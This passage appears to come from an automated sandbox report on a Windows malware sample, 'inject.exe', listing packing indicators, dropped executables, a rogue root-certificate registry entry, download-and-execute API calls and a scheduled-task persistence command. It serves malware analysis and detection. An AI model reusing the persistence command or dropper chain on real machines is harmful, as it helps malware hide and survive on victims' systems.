                  Source: inject.exeStatic PE information: real checksum: 0x0 should be: 0x556c5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06A3EFB2 push eax; ret 3_2_06A3EFC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_06CF3AD9 push ebx; retf 3_2_06CF3ADA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E76927 pushfd ; ret 3_2_08E7693B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E70D38 push 2C08DFCCh; retf 3_2_08E70D3D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7B1F2 push esp; ret 3_2_08E7B1F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7B1C3 push esp; ret 3_2_08E7B1E3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7B204 push ebx; ret 3_2_08E7B233
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7B202 push esp; ret 3_2_08E7B203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7B360 push edx; ret 3_2_08E7B383
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7B480 push ecx; ret 3_2_08E7B493
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_08E7D639 push edi; retf 3_2_08E7D63B
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004192C0 push eax; ret 5_2_004192EE
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0033676A push rcx; ret 9_2_0033676B
                  Source: inject.exeStatic PE information: section name: .text entropy: 7.994475414481835

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 BlobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 22_2_00301280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,22_2_00301280
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\conhost.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\inject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
